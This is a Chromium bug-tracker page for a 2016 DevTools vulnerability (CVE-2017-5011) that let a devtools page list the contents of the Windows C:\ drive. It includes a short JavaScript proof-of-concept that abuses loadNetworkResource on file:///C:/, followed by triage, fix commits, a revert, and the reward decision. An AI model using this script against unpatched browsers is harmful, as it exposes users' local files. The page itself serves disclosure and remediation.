Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Issue 662859 Security: chrome-devtools protocol allows to read the content of C:\ drive
Starred by 2 users Reported by chromium...@gmail.com, Nov 7 2016 Back to list
Status: Verified
Owner:
Closed: Jan 2
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 1
Type: Bug-Security



Sign in to add a comment
VERSION
Chrome Version: 56.0.2912.0
Operating System: Win7

REPRODUCTION CASE
1. Navigate to chrome-devtools://devtools/remote/serve_rev/@199588/devtools.html
2. Navigate to the link below in chrome-dev.txt (on the same tab)
3. Observe

Demo Attack Script [pre-encoding]:

function f() {c='d="",DevToolsAPI.streamWrite=function(e,o){d+=o},DevToolsAPI.sendMessageToEmbedder("loadNetworkResource",["file:///C:/","",0],function(e){d.split("\\n").map(function(e){e.match(/addRow.*;/)&&document.write(e.match(/addRow.*;/)[0]);})});' ;document.write("<script>window.document.write('<script>'+c+'</scr'+'ipt>');</scr"+"ipt>");}if( typeof DevToolsHost == "undefined" ) location.reload();elsef();

 
chrome-dev.txt
1.7 KB View Download
Recording.mp4
838 KB View Download
Components: Platform>DevTools
Looks very similar to 653134; I'm not sure how it differs?
Yeah, but in this report I used the first step to repro.
Labels: Security_Severity-High M-56 OS-Windows
Owner: dgozman@chromium.org
Status: Assigned
Does this repro on stable or canary only? (I don't have a windows machine handy to check.)
I couldn't repro this on 54.0.2840.87 (stable).
Labels: Security_Impact-Head
Project Member Comment 6 by sheriffbot@chromium.org, Nov 8 2016
Labels: ReleaseBlock-Beta
This issue is a security regression. If you are not able to fix this quickly, please revert the change that introduced it.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 7 by sheriffbot@chromium.org, Nov 8 2016
Labels: Pri-1
Comment 8 Deleted
Any updates on this bug? thanks.
Project Member Comment 10 by sheriffbot@chromium.org, Nov 21 2016
dgozman: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Dgozman@ Could you please take a look at this issue? - Thanks :).
Project Member Comment 12 by sheriffbot@chromium.org, Dec 2 2016
Labels: -Security_Impact-Head Security_Impact-Beta
Project Member Comment 13 by sheriffbot@chromium.org, Dec 5 2016
dgozman: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: -ReleaseBlock-Beta -Security_Impact-Beta ReleaseBlock-Stable Security_Impact-Stable
Impact stable per #8
This bug seems like has forgotten.
Cc: caseq@chromium.org
Comment 17 by caseq@chromium.org, Dec 28 2016
Cc: -caseq@chromium.org dgozman@chromium.org
Owner: caseq@chromium.org
Status: Started
Note this is not a recent regression -- I've been able to reproduce this on m55 (stable) as well.
Project Member Comment 18 by bugdroid1@chromium.org, Dec 29 2016
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/eea3300239f0b53e172a320eb8de59d0bea65f27

commit eea3300239f0b53e172a320eb8de59d0bea65f27
Author: caseq <caseq@chromium.org>
Date: Thu Dec 29 02:19:18 2016

DevTools: move front-end URL handling to DevToolsUIBindingds

BUG= 662859 

Review-Url: https://codereview.chromium.org/2607833002
Cr-Commit-Position: refs/heads/master@{#440926}

[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_ui_bindings.h
[rename] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_ui_bindings_unittest.cc
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/devtools_window.cc
[add] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/url_constants.cc
[add] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/browser/ui/webui/devtools_ui.h
[modify] https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27/chrome/test/BUILD.gn

Verified on 57.0.2969.1 (Canary). Fixed.
Status: Verified
Labels: reward-topanel
Project Member Comment 22 by sheriffbot@chromium.org, Jan 3
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Project Member Comment 23 by sheriffbot@chromium.org, Jan 5
Labels: Merge-Request-56
Project Member Comment 24 by sheriffbot@chromium.org, Jan 5
Labels: -Merge-Request-56 Hotlist-Merge-Approved Merge-Approved-56
Your change meets the bar and is auto-approved for M56. Please go ahead and merge the CL manually. Please contact milestone owner if you have questions.
Owners: amineer@(clank), cmasso@(bling), gkihumba@(cros), bustamante@(desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Cc: pfeldman@chromium.org
Project Member Comment 26 by bugdroid1@chromium.org, Jan 11
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/714ce74842af647ab192124910b08a07ee7d606b

commit 714ce74842af647ab192124910b08a07ee7d606b
Author: caseq <caseq@chromium.org>
Date: Wed Jan 11 01:31:09 2017

Revert of DevTools: move front-end URL handling to DevToolsUIBindingds (patchset #2 id:40001 of https://codereview.chromium.org/2607833002/ )

Reason for revert:
A better fix is coming, reverting this one to make it a part of the new fix so that one CL may be merged onto a branch.

Original issue's description:
> DevTools: move front-end URL handling to DevToolsUIBindingds
>
> BUG= 662859 
>
> Committed: https://crrev.com/eea3300239f0b53e172a320eb8de59d0bea65f27
> Cr-Commit-Position: refs/heads/master@{#440926}

TBR=dgozman@chromium.org
# Not skipping CQ checks because original CL landed more than 1 days ago.
BUG= 662859 

Review-Url: https://codereview.chromium.org/2620193002
Cr-Commit-Position: refs/heads/master@{#442758}

[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/devtools_ui_bindings.h
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/devtools/devtools_window.cc
[delete] https://crrev.com/451daad4f60a3ca0f7508097309d11a15da480fe/chrome/browser/devtools/url_constants.cc
[delete] https://crrev.com/451daad4f60a3ca0f7508097309d11a15da480fe/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/ui/webui/devtools_ui.h
[rename] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/browser/ui/webui/devtools_ui_unittest.cc
[modify] https://crrev.com/714ce74842af647ab192124910b08a07ee7d606b/chrome/test/BUILD.gn

Project Member Comment 27 by bugdroid1@chromium.org, Jan 11
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/c2db881506f5709433a5bf6ed981b1bc0c860598

commit c2db881506f5709433a5bf6ed981b1bc0c860598
Author: caseq <caseq@chromium.org>
Date: Wed Jan 11 03:39:32 2017

Fix front-end host creation upon navigation

- when navigating, add host bindings to the pending frame rather than old frame;
- force renderer swap if front-end URL is invalid;
- move front-end URL validation to DevToolsUIBindingds

This also re-lands https://codereview.chromium.org/2607833002

BUG= 662859 , 678035 

Review-Url: https://codereview.chromium.org/2620153002
Cr-Commit-Position: refs/heads/master@{#442781}

[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_ui_bindings.h
[rename] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_ui_bindings_unittest.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/devtools_window.cc
[add] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/url_constants.cc
[add] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/ui/webui/chrome_web_ui_controller_factory.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/browser/ui/webui/devtools_ui.h
[modify] https://crrev.com/c2db881506f5709433a5bf6ed981b1bc0c860598/chrome/test/BUILD.gn

Labels: -reward-topanel reward-3000 reward-unpaid
Greetings!  The panel took a look at this and decided to reward $3,000!  Please note that's only because this bug can be triggered from an untrusted extension. The amount of user interaction required in the bug as reported would have made it unlikely to receive a reward.
Thanks Andrew! :)
Hi caseq@ - mind doing the merge to M56?
Labels: -reward-unpaid reward-inprocess
Project Member Comment 32 by bugdroid1@chromium.org, Jan 24
Labels: -merge-approved-56 merge-merged-2924
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/d6f1c251f409263302a2df863df61314418dc4b2

commit d6f1c251f409263302a2df863df61314418dc4b2
Author: Andrey Kosyakov <caseq@chromium.org>
Date: Tue Jan 24 03:21:21 2017

Fix front-end host creation upon navigation

- when navigating, add host bindings to the pending frame rather than old frame;
- force renderer swap if front-end URL is invalid;
- move front-end URL validation to DevToolsUIBindingds

This also re-lands https://codereview.chromium.org/2607833002

BUG= 662859 , 678035 

Review-Url: https://codereview.chromium.org/2620153002
Cr-Commit-Position: refs/heads/master@{#442781}
(cherry picked from commit c2db881506f5709433a5bf6ed981b1bc0c860598)

Review-Url: https://codereview.chromium.org/2653783003 .
Cr-Commit-Position: refs/branch-heads/2924@{#853}
Cr-Branched-From: 3a87aecc31cd1ffe751dd72c04e5a96a1fc8108a-refs/heads/master@{#433059}

[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/BUILD.gn
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_ui_bindings.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_ui_bindings.h
[rename] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_ui_bindings_unittest.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/devtools_window.cc
[add] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/url_constants.cc
[add] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/devtools/url_constants.h
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/ui/webui/chrome_web_ui_controller_factory.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/ui/webui/devtools_ui.cc
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/browser/ui/webui/devtools_ui.h
[modify] https://crrev.com/d6f1c251f409263302a2df863df61314418dc4b2/chrome/test/BUILD.gn

Labels: Release-0-M56
Labels: -ReleaseBlock-Stable
Labels: CVE-2017-5011
Project Member Comment 36 by sheriffbot@chromium.org, Apr 11
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Sign in to add a comment